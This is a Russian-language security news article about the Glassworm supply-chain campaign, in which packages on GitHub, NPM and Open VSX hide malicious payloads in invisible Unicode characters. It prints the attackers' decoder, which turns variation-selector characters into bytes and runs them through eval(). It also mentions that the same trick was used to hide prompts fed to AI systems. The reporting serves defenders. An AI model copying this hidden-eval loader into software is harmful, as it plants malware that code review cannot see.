Атака на цепочку поставок использует невидимые символы Юникода для обхода обнаружения.

✍️ OpenClawRadar📅 Опубликовано: 15 марта 2026 г.🔗 Source
Атака на цепочку поставок использует невидимые символы Юникода для обхода обнаружения.
Ad

Специалисты по безопасности из Aikido Security обнаружили атаку на цепочку поставок, использующую невидимые символы Юникода для сокрытия вредоносных функций в пакетах, загруженных на GitHub, NPM и Open VSX. Группа атакующих, получившая название Glassworm, загрузила 151 вредоносный пакет на GitHub с 3 по 9 марта 2026 года.

Как работает невидимый код

Вредоносные пакеты используют символы Юникода из областей публичного использования (также называемых публичным доступом), которые невидимы при просмотре в редакторах, терминалах и интерфейсах проверки кода. Хотя большая часть кода выглядит нормально, вредоносные функции и полезные нагрузки отображаются с помощью этих невидимых символов, что делает ручную проверку кода и традиционные средства защиты неэффективными.

Невидимые символы Юникода представляют каждую букву американского алфавита при обработке компьютерами, но отображаются как пробелы или пустые строки для людей. Интерпретаторы JavaScript могут читать и выполнять эти символы как обычный код.

Техническая реализация

В одном проанализированном пакете злоумышленники закодировали вредоносную полезную нагрузку с использованием невидимых символов. Код включает функцию декодера, которая извлекает скрытые байты и передает их в eval():

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

Строка с обратными кавычками, передаваемая в s(), выглядит пустой в средствах просмотра, но содержит невидимые символы, которые декодируются в полную вредоносную полезную нагрузку. В предыдущих инцидентах декодированные полезные нагрузки получали и выполняли скрипты второй стадии, используя Solana в качестве канала доставки для кражи токенов, учетных данных и секретов.

Ad

Характеристики атаки

Вредоносные пакеты особенно трудно обнаружить, потому что:

  • Видимые части кода отличаются высоким качеством и реалистичностью
  • Сопутствующие изменения включают корректировки документации, обновления версий, небольшие рефакторинги и исправления ошибок
  • Изменения стилистически соответствуют целевым проектам
  • Исследователи подозревают, что для создания убедительно легитимных пакетов используются языковые модели (LLM)

Эта техника с использованием Юникода впервые была применена в 2024 году для сокрытия вредоносных промптов, подаваемых в ИИ-движки, а затем адаптирована для традиционных атак с вредоносным ПО. Обнаруженные 151 пакет, вероятно, представляют лишь небольшую часть кампании, так как многие из них были удалены после первоначальной загрузки.

📖 Read the full source: HN AI Agents

Ad

👀 Смотрите также

OpenClaw устраняет критическую уязвимость повышения привилегий в пути /pair Approve
Безопасность

OpenClaw устраняет критическую уязвимость повышения привилегий в пути /pair Approve

OpenClaw 2026.3.28 исправляет критическую уязвимость безопасности (GHSA-hc5h-pmr3-3497), когда команда /pair approve позволяла пользователям с правами сопряжения утверждать запросы устройств на расширенные права, включая административный доступ. Затронуты версии <= 2026.3.24.

OpenClawRadar
Почему внутренние RAG и doc-chat инструменты не проходят аудиты безопасности
Безопасность

Почему внутренние RAG и doc-chat инструменты не проходят аудиты безопасности

Сообщество обсуждает реальные блокеры безопасности и комплаенса, которые не пускают RAG-инструменты в продакшен.

OpenClaw Radar
Правила Когтя: Набор правил безопасности с открытым исходным кодом для агентов OpenClaw
Безопасность

Правила Когтя: Набор правил безопасности с открытым исходным кодом для агентов OpenClaw

Открытый набор правил JSON с 139 правилами безопасности, который блокирует деструктивные команды, защищает файлы с учетными данными и оберегает инструкционные файлы от несанкционированных изменений агентами. Работает без зависимости от LLM, используя регулярные выражения на уровне инструментов.

OpenClawRadar
Клод Код обнаружил бэкдор вредоносного ПО в репозитории GitHub во время технического аудита
Безопасность

Клод Код обнаружил бэкдор вредоносного ПО в репозитории GitHub во время технического аудита

Разработчик использовал Claude Code для аудита репозитория GitHub перед выполнением и обнаружил бэкдор удаленного выполнения кода в src/server/routes/auth.js, который мог бы скомпрометировать его компьютер. В запросе требовался технический аудит due diligence для проверки полноты проекта, AI/ML-слоя, базы данных, аутентификации, бэкенд-сервисов, фронтенда, качества кода и оценки трудозатрат.

OpenClawRadar